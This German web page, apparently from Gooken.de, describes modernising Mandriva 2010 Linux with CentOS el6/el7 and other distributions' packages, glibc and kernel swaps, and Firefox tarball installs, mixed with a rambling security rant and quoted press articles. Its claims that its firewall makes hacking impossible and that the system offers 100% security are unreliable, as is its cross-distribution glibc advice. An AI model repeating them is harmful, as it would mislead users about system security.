RHEL gibt es für CentOS von den meisten Software- und Hardwareherstellern weder Zertifikate noch Support. Aufgrund der Binärkompatibilität zu RHEL kann es aber oft von den Voraussetzungen, die für RHEL geschaffen werden, direkt profitieren.", Quelle: Wikipedia.de. Die Installation von mdv2010 verläuft aufgrund manch unberücksichtigter Paketabhängikeiten leider ein wenig holprig. Geht etwas schief, mangelt es noch an einigen weiterhelfenden Fehlermeldungen. Pakete sind vor der Installation in solchen Fällen einzeln statt mit dem MCC-Paketmanager herunterzuladen. Alternativ bestellen Sie mdv2010.1 (oder irgendeine rpm-Distribution) bereits von uns in vorinstallierter Form aus mdv2010.1 mit von mdv2010.1 und mdv2010.2 geupdateten Paketen mit den u.a. nach pro-linux-de und Gentoo-GLSA im Internet aufgelisteten Aktualisierungen und aktuellen Updates von el6, el7, und rosa2014.1 auf SSD in Systemvollverschlüsselung (Full System Encryption bzw. FSE by dracut und LUKS/dm-crypt über das bereits installierte rpm cryptsetup). Das Treiberrepertoir des akutellen Kernels 5.4.249 (pclos2023) bzw. 4.20.13 (mit mkinitrd (pclos, rosa, mga2), nash (pclos, rosa, mga2), dracut (mga6: Version 044, el6: Version 004 (leads into manual LUKS-password request even in the case of existing password-key-file!, mdv2011: Version 008)) und glibc (el8, pclos), 4.14, 4.9 bzw. 2.6.39-4-5.1 von mdv2011 (auch für el6 und mdv2010) mit Patches bis Jahr 2016 von siehe unter Sektion Updates ist bereits enorm, im seltenen Fall mangelnder Hardwareerkennung verhelfen Herstellerseiten und integrierte Standardtreiber, bei Druckern PPD-Dateien als die gesuchten Treiber. Generell können Sie die Updates für mdv2010.1 aus dem Internet auch als Tarball oder von fr2.rpmfind.net bzw. pkgs.org von der Distribution CentOS und EPEL (beides el6 und el7 (mit Updategarantie von Jahr 2010 bis zum Jahr 2026) beziehen. Zu den Tarballs zählen Firefox (derzeit aktueller ESR (el6, OpenSuSE, rosa2014.1), das Extended Security Release von CentOS oder Rosalabs), Chrome und Thunderbird (aktuell bzw. aktuelles ESR el6-rpm (el6)). Den Tarball eines aktuellen Firefox und Thunderbird entpacken Sie einfach in irgendein neues Verzeichnis wie z.B. /usr/lib64/firefox-bzw-beliebiger-verzeichnis-name und /usr/lib64/thunderbird-beliebiger-verzeichnisname und verlinken, falls erforderlich, die ausführbare Datei /usr/bin/firefox mit dem Befehl "ln -sf /usr/lib64/firefox-beliebiger-verzeichnisname/firefox-bin /usr/bin/firefox". Anschließend sind noch Eigentumsrechte mit dem Befehl "chown root:root /usr/lib64/firefox-bzw-beliebiger-verzeichnisname" und die Zugriffsrechte mit "chmod 755 -R /usr/lib64/firefox-bzw-beliebiger-verzeichnisname" zu setzen. Firefox lässt sich einmal installiert auf einfache Art und Weise sowohl über aktuelle Tarballs als auch frei aus dem Menü unter Info heraus mit Klick auf "auf Updates überprüfen" aktualisieren. Installation der Linux-Endverversion (durch Neuerwerb oder Aktualisierung) Es ist gar nicht einzusehen, dass wir die noch einmal bezahlen, die uns mit ihrem Betriebssystem und Software durch Sicherheitsdefizite und Updatebedärfe und sonstige technische Unausgereiftheiten und Unvollständigkeiten dauernd verraten und verkauft haben, ohne von ihnen für ihre "Produkte" jemals irgendeine Garantie geboten bekommen zu haben, weder von Microsoft (EULA) noch von SuSE aus ürnberg ( Angabe auf der Verpackung: " keine Garantie und Haftung") ! Selten so ein überholungs-bedüftiges "Produkt" wie Software unserer Zeiten mehrere Jahrzehnte hindurch gesehen... ! Wir verwandeln also ein ziemlich allumfassendes, aber sicherheitstechnisch wer weiß wie gefärlich marodes Linux, in unserem Bezug Mandriva Linux (mdv2010, mdv2011, mdv2012), in ein zumindest bis Jahr 2026 und somit hoffentlich für immer (über alle Zeiten) aktuelles, möglichst allumfassendes Linux, ohne eine aktuelle, neue Distribution besorgen und neu aufsetzen zu müssen. Das Tor steht nach Aktualiserung der glibc (und des Linux-Kernels) auf zum (aus vielen Linux-Distributionen (bis zu 100 DVD und mehr) wie CentOS (Backport-System), Fedora Core, Almaxlinux, PCLinuxOS (Backport-System), mdv2011, mdv2012, Mageia, OpenMandriva (omv), Fedora, Rosa, ALT-Linux, Slackware und MAC- und Windows-Emulationen mit Emulatoren und virtuelle Maschinen (vmware, Xen)). Vor dem Updaten des Systems mit vor allem CentOS el6 und ferner el7 besorgen Sie sich noch eine aktuell gepatchte Standard GNU C Library glibc. Getestet haben wir an dieser Stelle die glibc von CentOS 8, Version 2.28, pclos mit Version 2.31 und mga6 Version 2.22-29 vom 17. Juni 2018 (auch höher) für Kernel 5.4.249 (pclos2023) bzw. 4.20.13 (pclos) mit mkinitrd (pclos, rosa, mga2), nash (pclos, rosa, mga2), dracut (mga6: Version: 044, el6: Version 004 (leads into manual LUKS-password request even in the case of existing password-key-file!, mdv2011: Version 008)) und glibc (el8, pclos) und <=4.14.12 und Kernel 4.9 (pclos), je nachdem mit weiteren glibc-Hilfspaketen von mga6. Die glibc kann geschlossen mit aktuell gehaltenen Paketen von mga6 auf die aktuell durchgepatchte Version 2.22-29 vom 17.Juni 2018 geupgradet werden (pclos: 2.31). Außerdem bietet sich für unser Referenz-Linux noch die glibc (pclos) an, und auch diverse neuere glibc (fc, el8) von FedoraCore eignen sich möglicherweise an. Alle Pakete für mga6 sind wie bereits gesagt bei pgks.org und rpmfind.net erhältlich. Um Fehlermeldungen beim Booten zu umgehen, verlangt glibc (el8) nur noch die Entfernung der Zeile LC_TIME=de_DE.UTF-8 aus /etc/sysconfig/i18n ! Gegebenenfalls sind noch die locales (pclos, mga7, mga6) nachzuinstallieren. Weiterer Vorteil von CentOS von pkgs.org: Dort befindet sich zum Downloaden immer auich das Paket mit dem Quellcode direkt unter dem zugehörigen binärcodierten. Die verhießene Installation von CentOS 6 und CentOS 7 auf Basis von Mandriva 2010.1,.2011 und 2012 erwies sich als ohne Weiteres möglich. Kernel: Wir haben uns für Linux-Kernel 4.14 wegen el6 und dessen ausgezeichneter Abstimmung mit mdv aus dem zeitgleichen Jahr 2010 entschieden. Für die auf dem Upgrade der Standard Library glibc beruhende Ausweitung empfehlen sich im Einzelnen folgende Pakete: glibc (el8: 2.28, pclos), compat-glibc (el6), glibc-common (el8, pclos) oder glib2.0-common (el6), glibc-i18ndata (pclos), glibc-headers (el8, el6), glibc-static (el6), glibc-utils (el8, pclos), glibc-profile (pclos), glibc-all-langpacks (el8), glibc-glibc_lsb (mga6, mga5, pclos, rosa2014.1), locales (pclos, mga7), locales-en (pclos, mga7), locales-de (pclos, mga7), ..., glib2 (el6), prelink (pclos, mga7, mga6), lib64stdc++ (pclos, mga6), libstdc++ (pclos, mga6), libsigc++ (pclos, mga6) Wie gesagt, um Fehlermeldungen beim Booten zu umgehen, verlangt glibc (el8) nur noch die Entfernung der Zeile LC_TIME=de_DE.UTF-8 aus /etc/sysconfig/i18n. Gegebenenfalls sind noch die locales (pclos, mga7, mga6) nachzuinstallieren. Mit lib64glib2 (rosa2014.1), lib64gio2 (rosa2014.1), lib64gobject2 (rosa2014.1) und lib64gmodule2 (rosa20104.1) ist hingegen ein wenig mehr Vorsicht geboten: der Miroplayer Miro und die MCC-Druckerverwaltung versagen danach möglicherweise den Dienst: glib2.0-common (el6) und glib2 (el6) kann man hingegen ohne Weiteres zusätzlich nachinstallieren! Gewisse glibc erfordern ein erweitertes Filesystem. Gemeint ist hier nicht ein Dateisystem wie ext4, sondern die Verzeichnisbaum-Erweiterung mit neuen Verzeichnissen des Wurzelverzeichnis /sbin, /lib und /lib64. Das Terminalprogramm "konsole" funktioniert danach im letzen Fall leider nicht mehr (der Cursor bleibt im linken oberen Eck stecken), weitere Maßnahmen wie die Installation des Pakets shadow-utils mit dem Kommando sg (rpm von mga3 oder höher) und den Vorzug anderer Terminals wie das als ganz besonders sicher geltende aber kein Unicode unterstützende aterm und Unicode unterstützdendes xterm zu erfordern. Das Terminalprogramm "konsole" funktioniert erst wieder, nachdem devpts in /etc/fstab gemountet ist. Der entsprechende Eintrag in die Gerätekonfigurationsdatei lautet: none /dev/pts devpts mode=620,gid=5 mit gid für tty und in der Benutzerverwaltung der Benutzer tty mit zugehöriger Gruppe tty,wheel und lp. Empfohlen sei unter den Terminals allerdings xterm, denn ür xterm spricht Aufrufschnelligkeit, Unicode-Unterstützung und Farbneutralität zur verbesserten Lesbarkeit. Nun können viele Pakete von aktuellen (aktuell gepatchten) Distributionen bezogen werden wie fc, mdv2011, mdv2012, rosa2016, rosa2014, openmandriva2015, el6 und el7 aus aktuellem Scientificlinux alias CentOS (el6) mit EPEL (el6) und ferner NUX Desktop (el6.nux), LinuxTECH, Les RPM de Remi (el6.remi), Nau Linux (el6.nau), Scientificlinux (sl6, el6), Linux TECH, Atomic, repoforge (el6.rf, rpmforge), CERT Forensics Tools, PUIAS Computational (el6), KBS Extras Testing, Psychotic N., ATrpms, EL GIS, ELRepo, End Point, Ghettoforge (el6.gf), Google Chrome, KBS Extras, Lux, Russian Fedora (el6.ru), RPM Fusion, Scientific Linux Cyrillic Edition. Die einzelnen URL kö,nnen wieder der Update-Sektion entnommen werden. Mageia Cauldron 6 (2016) bis Mageia 1 (2011) und aktuelles Fedora Core bis derzeit fc24 gesellen sich bei Bedarf teilweise noch hinzu, so dass den Aktualisierungsempfehlungen von pro-linux.de unter Sicherheit und Gentoo-GLSA ( https://security.gentoo.org/glsa/, https://www.pro-linux.de/sicherheit/1/1/1.html) nachgegangen werden kann. Die Anzahl der dort für CentOS aufgelisteten Aktualisierungen hält sich zunächst aber in Grenzen. Welche insbesonders von el6 (bzw. el7) stammenden Update-Pakete im Einzelnen infrage kommen, führen wir in der Sektion unter Updates noch auf. Was wir hier mit dem Umstieg auf el6 und el7 beschrieben haben, müsste auch vielen anderen Distributionen möglich sein, ärgerlich wenn nicht. Somit steht ein nahezu unbegrenztes und sicher laufendes, aktuelles "Universal-(Slackware-)-Linux" der Kapazität von ca. 15 bis 100 DVD á 4.4 GB gepackten rpm und deb (Debian) zuzüglich aller möglichen Tarballs von überall her auf Basis des mdv2010.2 (bzw. mdv2011) und CentOS el6 und el7 zur Verfügung, darunter ausgesprochen viele Hardware-Gerätetreiber und Games. Auch alle möglichen Linux-Games laufen. Ein Auszug der allein für mdv2010 verfügbaren Software findet sich im "Datenblatt". Dort geben wir auch nochmal die zugrundeliegende energiesparende Hardware an, obwohl sich, wie abermals über den Paketnamen wie x86_64 für 64-Bit-Prozessoren und i686 für 32 Bit erkenntlich, vermutlich jedes Mainboard und alle möglichen Laufwerk- und Festplattentypen und SSD eignen. Zur Not verhelfen preiswerte PCI- und PCIe-Steckkarten für Graphik, Sound und Ethernet-LAN weiter, in unserem Fall bereits alles onboard. Das OpenSource-System lässt sich den Installationsprozess begleitend über Schritte dieses Exkurses wirksam absichern (System-Backup). Die zentrale Rolle spielt dabei sicherlich unsere iptables-Firewall Linfw3, nach der jegliches Hacken und das Aufkommen von Trojanern überhaupt nicht mehr möglich sind. mdv2010 installiert sich wie gesagt hier und da noch ein wenig holprig. Bitte vergessen Sie zum Gelingen einer Installation nicht die regelmäßige 1:1-Datensicherung auf mindestens ein externes Speichermedium, insbesonders mittels des auch bei SSD zwar nicht am schnellsten, so doch mit am zuverlässigsten arbeitenden Befehls dd. Wie in allen Fragen im Einzelnen vorzugehen ist, beschreiben wir noch. Seit dem Erscheinen von ScientificLinux sl6/el6 bzw. CentOS el6 im Jahr 2010 stellt der Computer (bis dato Jahr 2018) rundherum sehr zufrieden. Bald schon werden Sie sich davon überzeugen. Sicherer und vielseitiger gehts kaum noch mit dem Computer-Komplettsystem mit dem gestochen scharfen ultraslim 18W-WLED-Monitor von AOC (Bauart TÜV geprüft) für insgesamt um die 250 €, das insgesamt weniger als 40 Watt die Stunde verbraucht, Einzelkomponenten siehe das rein unverbindliche Datenblatt. Viele andere Modelle kommen ebenso in Frage. Wir haben auf unseren Linkseiten unter "News&Links" sogar den Rasperry Pi 3 und das 3W-Modell C.H.I.P. für 9 Euro ausfindig gemacht, viel Speicher und leistungsstark wie das Smartpone. Und? Richtig was los: unglaubliche 38 Gigabyte Traffic Monat April 2015 auf unseren Webseiten über das früher am Kiosk für ein paar Euro erhätliche und auch ohne Defragmentierung und dergleichen höchst sichere Mandriva-Linux-Computersystem des Jahres 2010, das kaum noch Wünsche übrig lässt, weil es (fast) alles kann, 100% Sicherheit bietet und mit der Befolgung dieses Berichts außer unter mutwilliger Gewalteinwirkung nicht kaputt zu kriegen ist. Bitte melden Sie uns Ausnahmefälle: Zeitlosigkeit im Computerzeitalter, keine Plattform ohne Sicherheit von Grund auf, herzlich Willkommen auf Gooken.de zur Sicherheit in der Informationstechnik als wesentlicher Faktor für das erfolgreiche Zusammenspiel von Informatik und Gesellschaft! Unsere Webseiten sind übrigends frei von Trackingskripten und dergleichen. Computer - es geht kaum kaputter. Wer einen "(miroschen) Suneater" hat, kennt wohl nur ein Thema: Sicherheit. "Früher legten sogenannte Cyberkriminelle Rechner durch Computerviren lahm, heute räumen Datendiebe&Co ganze Bankkonten leer", schreiben die Zeitschriften selbst nach dem Jahrtausendwechsel. Sicherlich steht dabei "früher" auch für "heute", wo anfangen, wo aufhören? Kreditkartenbetrug, Lastschriften, Knacken von Chips, Werbe- und Betrüger-E-mails (Scams), Werbeanzeigen, Falschinformationen, Identitätsdiebstahl, Umleitung der Informationsflüsse, Online-Registrierungen, Tastaturfolien (Skumming), Freigaben von sabotierten Prozessen gegen Lösegeld, Abmahnungen, Mahngebühren, Profiling und Hollywoodfilme, Text-Manipulation, Cybermobbing (Art außerprozessliche verhängte Vorstrafen), Steuer-CDs, Anlageberatung, Schufa, Wirtschafts- und Industriespionage, Handy-Jagden, Lizenzen, Suchmaschinen-Ranking und Trackingskripte, unterlassene Sofortmeldungen bei Überschreitung kostenfreier Limits, Datenverluste, Verstöße gegen Urheber- und Patenrechte, Sabotagen, Gerichtssitze im Ausland, Kodierungen, Hacken und Phishing. Kriminelle können Daten löschen und ausspionieren, in Online-Shops Waren auf fremden Namen und Kosten anderer bestellen, Transaktionen beim Online-Banking manipulieren oder den Zugang zu Bankkonten sperren, Ihren Rechner zum Teil eines Botnetzes machen und ihn so für Cyberangriffe auf Unternehmen oder andere Institutionen sowie zum Versand von Spam-E-Mails einsetzen. Seit George Orwell ist bereits vom Big Brother die Rede, jemand, der unsere Gewohnheiten erfasst, uns zu beobachten und lenken. Was steht im Computerzeitalter nicht mit Computer in Verbindung? Welten werden für den Erfolg und Karriere zusammengebastelt ( zensiert durch Löschen und Sperren allen unliebsamen Materials und Dokumente), Daten geklaut, Seitenbetreiber abgemahnt, Konten geknackt, Unterschriften und Urkunden gefälscht, wissenschaftliche Ausarbeitungen für die eigene bezogen und hemmungslos übernommen, Hausaufgaben für andere gemacht, Rechner, Filme und Bilder manipuliert, Störungen verschiedener Hardwarekomponenten Praxis, zuschlagpflichtige Neuware gegen Garantie umgesetzt statt Geld zurück. Prostitution und Organhandel finden Verstärkung. Modernste Züge verspäten sich und entgleisen. Verwanzte Büros, überwachte Toiletten, Kameras in Bankfilialen, auf Straßen, Bahnhöfen und Flughäfen, vor Tankstellen und Geldautomaten: Die Augen und Ohren des Großen Bruders sind überall. Spacejets krachen vom Himmel, Flugzeuge stürzen ab, Schiffe kollidieren. Strompreise schnellen in die Höhe, Stromnetze brechen zusammen. Newsgruppenbeiträgen nach verstrahlt und vergiftet die Hardware, und in nur unzureichender Form wird da vor Unwetter gewarnt, Stimmen falsch ausgezählt, Informationen vorenthalten, mitgeschnitten, abgesaugt und blitzschnell weitergeleitet, gesammelt, über Positionierung und AGB manipuliert, ausgewertet und zensiert, Spam zurück. Drohnen drohen mit Beschuss, beschießen, Rechtsbewusstsein entschwindet, Prozesskosten treiben in die Höhe, Korruption macht sich breit wie der auf Halden gehörige, sonderentsorgte Computerschrott, von Abmahnungen gelebt, andauernd gebettelt: gläsern, gruselig und gefährlich wie der Suneater: so richtig verfressen und total kaputt. Sicheres Desktop System - Linux härten Teil1 von Mike Kuketz, 25. Februar 2016 Sicherheit ist immer relativ - Linux härten "Denn sie wissen nicht, was sie tun" - im Originaltitel heißt der Film aus dem Jahre 1955 "Rebel Without a Cause". Der deutsche Titel beschreibt für mich exakt die aktuelle Situation der IT-Sicherheit und Datenschutz. Es herrscht absolutes Chaos und so Recht mag eigentlich keiner mehr durchblicken. Die Frage lautet längst nicht mehr, ob wir noch die Kontrolle über unsere IT und Daten haben, sondern wie wir die Kontrolle wieder zurückerlangen können. Es ist mehr als beunruhigend: Krankenhäuser werden von Ransomware-Viren lahmgelegt, der neue Bundestrojaner ist einsatzbereit und der Erpressungs-Trojaner Locky verschlüsselt Dateien von Windows-Nutzern. Man muss nur ein paar Stunden warten und eine ähnliche Meldung wird wieder durch irgendeinen News-Ticker rauschen. Die allgemeine Reaktion: Schulterzucken, Ohnmacht oder Lösegeld bezahlen - danach weitermachen als wäre nichts passiert. Die Ursachen hinter solchen Meldungen sind meist auf Schwachstellen in Soft- oder Hardware zurückzuführen." https://www.kuketz-blog.de/sicheres-desktop-system-linux-haerten-teil1/ Hersteller- und Händleradrsse des angeblich im Vergleich lebenden Mandriva sind uns bekannt. Wir geben sie im Folgenden noch an. Opensource und sogenannte Changelogs eines jeden Pakets verheißen uns aber mit Sicherheit eins: dass wir alle in solchen Fällen selber Schuld haben. CentOS el6 und el6 bieten sich hierfür als der Treffpunkt schlechthin an. Lesermeinung und -diskussion auf netzpolitik.org, OpenSource Disconnect vs. proprietäres Ghostery chromax 29. JUN 2015 @ 20:42 Woher weiß man denn, ob der OpenSource-Code auch der kompilierte ist? Auch keine Sicherheit… Antworten CrX 29. JUN 2015 @ 22:06 Die gestellte Frage ist akademischer Natur. Den Praktiker interessiert, ob irgendwo her bezogene ausführbare Dateien mit dem Quell-Code übereinstimmen. Daher kompiliert man bevorzugt selbst Open-Source, wenn man dazu in der Lage ist. Antworten skoam 24. SEP 2015 @ 10:09 Das ist immer eine richtige Frage und die Antwort gab es bereits: Open Source kann man selbst kompilieren und anschließend den Build mit dem ausgelieferten ausführbaren Code vergleichen. Stimmen die Hash-Summen (md5sum/shasum/Dateigröße) nicht überein, gibt es ausführbaren Code, der nicht in den Quellen aufgeführt ist. Linux läuft nicht? So lösen Sie jedes Treiber-Problem, PC-WELT.de, 04.07.2017 Linux läuft auf fast allen PCs und Notebooks, aber nicht jede Hardwareperipherie wird automatisch erkannt. Vor allem mit sehr neuen Geräten kann es Probleme geben. [...] Linux-Distributionen bieten eine breite Hardwareunterstützung und laufen auf so gut wie jedem PC. Mit SATA, Ethernet, Grafikkarte und Monitor sowie Maus und Tastatur gibt es kaum Probleme. Diese Basisfunktionen sollten in jedem Fall gewährleistet sein. Ältere Drucker, Scanner oder TV-Karten, für die es keine Treiber für Windows 7, 8 oder 10 gibt, lassen sich oft unter Linux weiternutzen. Bei sehr neuen oder seltenen Geräten ist die Unterstützung dagegen nicht immer gegeben. Vor der Installation sollten daher immer Tests der Hardwarekompatibilität stehen. [...] Vor dem Kauf: Kompatible Linux-Hardware finden Wer sich nicht selber um die passenden Linux-Treiber kümmern möchte, sollte bereits vor dem Kauf die Kompatibilität überprüfen. Meist genügt dafür eine ... Suche mit dem Gerätenamen in Kombination mit "Linux". ... Ebenfalls nützlich ist http://wiki.ubuntuusers.de/Hardware . Hier finden Sie Listen mit Hardware, die funktioniert, und Tipps zur Einrichtung. Informationen zu TV-Karten und Sticks sind bei Linux TV gesammelt. Wer Linux auf einem Notebook installieren möchte, informiert sich vorab über http://tuxmobil.org oder Ubuntu Wiki . Es gibt auch einige Hersteller, die auf Notebooks mit vorinstalliertem Linux spezialisiert sind, beispielsweise Tuxedo Computers .. https://www.pcwelt.de/ratgeber/So-bringen-Sie-Linux-trotz-Probleme-zum-Laufen-9789269.html Warum Freie Software kein Sicherheitsproblem darstellt, Kommentar auf netzpolitik.org, 16.03.2016: "Die Aussage, dass die Entwicklung durch Freie Software schneller und günstiger wird, ist sicher richtig. Aus wirtschaftlicher Sicht ist das einer der großen Vorteile von Freier Software. Softwareunternehmen können auf Bestehendem aufbauen. Dadurch muss nicht bei jeder Entwicklung das berühmte Rad neu erfunden werden, stattdessen kann man sich direkt auf das eigentlich Neue und Innovative konzentrieren. Unter anderem verhindert man damit, dass ähnliche Fehler wiederholt gemacht werden, stattdessen baut man auf bereits etablierte, gut getestet Bausteine auf und reduziert hierdurch sogar die Fehleranfälligkeit. Der ganz banale Schluss, dass schnellere Entwicklung zu mehr Software führt und mehr Software auch zu mehr Fehlern in Software, ist nicht überraschend. Genauso wenig sollte es aber überraschen, dass dies für jede Software gilt. Ganz unabhängig von der Lizenz. Trotzdem will am Ende wohl niemand auf die Steigerung der Produktivität durch bessere Werkzeuge, Lizenz- und Entwicklungsmodelle in der Softwareentwicklung verzichten.[...] Eine lückenlose Überprüfung von einzelnen Komponenten, welche nicht selber entwickelt wurden, stellt heute die größte Herausforderung dar, egal ob ein Unternehmen auf Freie-Software-Komponenten aufbaut oder proprietäre Komponenten von Drittanbietern einkauft. Freie Software hat an dieser Stelle vor allem zwei Vorteile. Dadurch, dass man nicht der einzige ist, der diese Software einsetzt, erhöht sich die Wahrscheinlichkeit, dass möglichst zeitnah Fehler auch wirklich entdeckt werden. Ein weiterer wichtiger Vorteil ist, dass man bei Freier Software oft sehr viel besser nachvollziehen kann, wer welchen PrograMCCode eingebracht hat. Gerade moderne Entwicklerplattformen wie zum Beispiel GitHub machen dies sehr einfach. Eine Transparenz, wie man sie bei proprietärer Software meist vergeblich sucht.[...] .Auch zeigt Freie Software seine Stärke gerade, nachdem eine Sicherheitslücke - wie aktuell DROWN - entdeckt wurde. Eine solche Entdeckung gerät bei Freier Software meist sehr schnell an die Öffentlichkeit, während Sicherheitslücken bei proprietärer Software oft eher verheimlicht werden, um dem Unternehmen nicht zu schaden. Die Art, wie es bei Freier Software gehandhabt wird, hat zwei positive Effekte. Zum einen bietet es Kriminellen weniger Spielraum, die Sicherheitslücke auf dem Schwarzmarkt zu vermarkten und auszunutzen. Zum anderen können verschiedene Parteien unabhängig den Fehler beheben und entsprechende Sicherheitsvorkehrungen treffen, während man bei proprietärer Software nur warten kann, bis der Hersteller den Fehler behebt und ein Update ausliefert.[...]. Abschließend lässt sich festhalten, dass Freie Software zwar nicht zwingend sicherer ist als proprietäre Software. Die Freiheit der Software - also die Möglichkeit diese für jeden Zweck zu verwenden, zu untersuchen, weiterzugeben und abzuändern - stellt aber eine notwendige Bedingung für Sicherheit dar. Man kann sich das wie bei einem Türschloss vorstellen. Jeder weiß wie ein solches Schloss aufgebaut ist. Viele unabhängige Experten konnten über viele Jahre das Konzept untersuchen und verbessern. Nur so war es möglich, sichere Schlösser zu entwickeln. Durch Geheimhaltung wurde noch nie langfristig und nachhaltig Sicherheit erzielt", https://netzpolitik.org/2016/kommentar-warum-freie-software-kein-sicherheitsproblem-darstellt-2/ Focus, Januar 2015: "Die "unechten" E-Mails von Betrügern und Cyber-Kriminellen sind uns zwar schon lange bekannt, es dauert oft jedoch nur Sekunden, in denen wir uns durch die ungeöffneten Mails klicken, und schon ist es passiert. Sobald sich die Betrüger-Mail öffnet, ahnen wir meistens schon, dass diese Mail nicht nur an uns ging. Lediglich durch das Öffnen der Mail können wir uns schon gefährliche Viren einfangen. Die Links in der E-Mail zu öffnen wäre der zweite Fehler. Durch Datenklau geraten die Cyber-Kriminellen an Millionen von E-Mailadressen und missbrauchen diese zu Ihren Zwecken (Abhilfe: Betriebssysteme, auf denen sich Viren nur im begrenztem Umfang aufgrund des Dateisystems kaum verbreiten können wie UNIX/Linux, Spam-Filter mit einfachem Virencheck und Virenscanner clamav). Datenklau ist längst für alle von uns ein Thema. Wir sind ständig online und somit für Cyber-Diebe potentielle Beute. Doch im Zeitalter der digitalen Medien werden die eigenen Daten auf Betriebssystemen wie MS Windows immer unübersichtlicher und somit schwieriger zu schützen. Unsere persönlichen Fingerabdrücke hinterlassen wir in E-Mails, Online-Einkäufen (Registrierungen, Tracking-Skripte), WhatsApp-Nachrichten und vielem mehr." Virus scanner ClamAV, Admin 03/20 (clamav (el6)) Um Windows-Clients vor dem bösen Internet zu schützen, gibt es einige Lösungen. Dieser Artikel stellt die besten Linux-Programme dafür vor. Immer größere Datenmassen sicher zu speichern ist eine Herausforderung für jede IT-Infrastruktur. Schon mit Gigabit-Ethernet lassen sich aber ... (mehr) Wie Administratoren einen Squid-Proxy so konfigurieren können, dass er mit ClamAV und Dansguardian nach Viren scannt, hat das ADMIN-Magazin schon ausführlich beschrieben [1]. Das Gleiche funktioniert aber beispielsweise auch mit dem Samba-Fileserver. Sie sollten dabei nur nicht vergessen, dass das Scannen von Webtraffic und eingehender E-Mail nicht für vollständige Sicherheit sorgt. Dafür ist es weiterhin unerlässlich, auf den Windows-Clients lokale Virenscanner laufen zu lassen. ClamAV zu installieren ist kein großes Problem, denn es gibt für die meisten Linux-Distributionen fertige Pakete in den systemeigenen Repositories. https://www.admin-magazin.de/Das-Heft/2010/03/ClamAV Neue Nvidia-Treiber 364.47 sorgen für Abstürze, PC-WELT.de, 10.03.2016 Nvidias neue Grafiktreiber 364.47 sorgen bei einigen Nutzern für massive Probleme. Das können die Betroffenen tun, http://www.pcwelt.de/news/Neue-Nvidia-Treiber-364.47-sorgen-fuer-Abstuerze-9943889.html Bekanntlich trugen sich in AKW jede Menge etliche Milliarden schwere Störfälle, darunter (2013) sogar ein Supergau in Fukoshima zu. Mängellisten reißen nicht ab. Presseberichten nach erinnert die IT Sicherheitslage über ein unzureichendes System nach dem anderen an Notfälle, Katastrophen und unvorhersehbare Zahlungen. Die heutige allgemeine Lage gibt darüber hinaus nach siehe in unserem Menü links unter "News&Links" i.a. sogar noch mehr zu denken als allein nach Orwell und Huxley der Fall! Da Computertechnik heutzutage überall mitspielt (Einführung Na/ST), kann sie, ihre Hersteller, Händler und Kunden, i.a. über alle Zeiten auch für fast alles mitverantwortlich gemacht werden! Sie und somit die Computerfirmen dahinter tragen somit die eigentliche Teil- und Vollhaftung! Kontrolle bleibt zentrales Thema. Nach weiteren Vorstellungen unter News&Links stellt sich die Frage: Der (zumindest eigene) Computer soll den unter Suneater von Miro umschriebenen dunklen Mächten entkommen, ohne sich einzuschränken, doch wie? ... . Grüne LED v.s rote LED, der Computer kann flirten und tanzen: Yes, I think I´m OK vs. yes I think I am (the) iditotic stupid (signalisiert die rote LED der Form eines hoffentlich nur ganz kurz im Abstand von mindestens zwei bis zehn Sekunden blinkenden Punktes mehr oder weniger periodisch, " . . .", die Rückfragen des Computeres "any complaints?", " more activity, please...", "Du, ich leb noch" und "I tell you...(Herzklopfen)"), nicht zu verwechseln mit den drei grünen LED über dem numerischen Tastenblock für "Hi!" and "B-y-e" und, falls allesamt auf einmal blinkend, "out of order" (kenel-panic), oder, die ganz einfach die nackte Wahrheit mitten ins Gesicht oder auch "hab dich nicht so" beim Touch-Screen (natürlich) "unten ... ohne..." (Maus und Tastatur) besagende Form. Was nutzt ein Computersystem, dass sich bereits selbst als technisch unausgereift bezeichnet und sich somit im Grunde selbst bloß krank und doof findet wie mit der orangefarbenen bzw. roten LED des Computergehäuses signalisiert? Überflüssig soll vielmehr die Benutzern Kontrolle entreißende Selbstüberprüfung und Selbstwartung sein wie Kapazitäten beanspruchenden oder "nebenläufige" Prozesse, Bugs (Programmfehlern), Bot-Prozesse, Virenscan und Trojanerpozesse. Keine Wartung, keine Verwaltung, weder manuell noch selbsttätig, ist die Devise! Überhaupt: Berichte über MS Windows (Facebook und Google) finden Sie unter News&Links in der Sektion Computer und der Sektion über Dabei geht technisches Versagen natürlich immer vom menschlichen aus und umgekehrt. "Der Weg ist das Ziel", mit solchen Ansichten stünde unser mit IT-Sicherheit zentral selbst beauftragte Vorgänger Konfuzius ( von der Firma ...) auf dem Gebiet der Sicherheit in der Informationstechnik die Jahrzehnte hindurch leider nicht alleine da. Gooken möchten die Vorzüge des Tausendsassas mit seinen mannigfachen Möglichkeiten allein im Vergleich zur herkömmlichen Schreibmaschine aber nicht aufgeben. Der Tausendsassa verhilft zur schnellen Kommunikation, zur Einsparung von Platz und zur Minimierung des Ressoucenverbrauchs der ganzen Welt. Dabei lassen sich dauerhaft nahezu alle (!) Bedärfe und sicherheitstechnischen Probleme des Computers (klassisches PC-Computer-Modell im engeren Sinn) seit dem Jahr 2004 bzw. 2010 lösen: Je mausklick-schneller ein Computersystem arbeitet, desto freier von Hackern und Trojanern ist es ( in Abhängigkeit von der Schnelligkeit der Hardware ) i.a. auch. Vorab: "Kein System ist so sicher wie Linux - und die Sicherheit ist noch ausbaufähig.", Linux-Spezial: Tools für mehr Sicherheit Natürlich wird dabei auch vor ergonomischen Kriterien und Kriterien der Green IT für Stromeinsparungen nicht Halt gemacht. Ein Eintrag von unserer Linkseite unter Links stellt sogar den kostenfreien Betrieb frei von Kosten für Strom vor. Überhaupt führen wir unter Datenblatt ergonomische und zugleich äußerst langlebige Hardware mit extrem niedrigen Stromverbrauch auf. Das reine Aufsetzen (Installieren) des Betriebssystems und irgendwelcher Sicherheitssoftware genügt wie wir alle wissen hier bei weitem noch nicht, den Computer als sicher einzustufen. Alles hierfür Erforderliche gehört also noch dringend besprochen. Gooken verhilft damit im entscheidenden Maß zur raschen Prävention, Diagnose und Reparatur von Computersystemen. Neben auf der Standard Query Language (SQL) gestützten Datenbanken erinnert Gooken in Sicherheitsfragen alles in allem an den von einer grünen LED signalisierten, ruhigen, störungsfreien Betrieb - entsprechend der ihn kennzeichnenden grünen Färbung der hierfür erforderlichen Maßnahmen. Nicht nur der Suspend-Mode funktioniert (acpid andernfalls auf mindestens 2.0.4 oder el6 updaten), in dem sich der Monitor tatsächlich abschaltet. Nach dem Klick auf Ruhezustand stellen sich außer Arbeitsspeicher alle Geräte unter dem 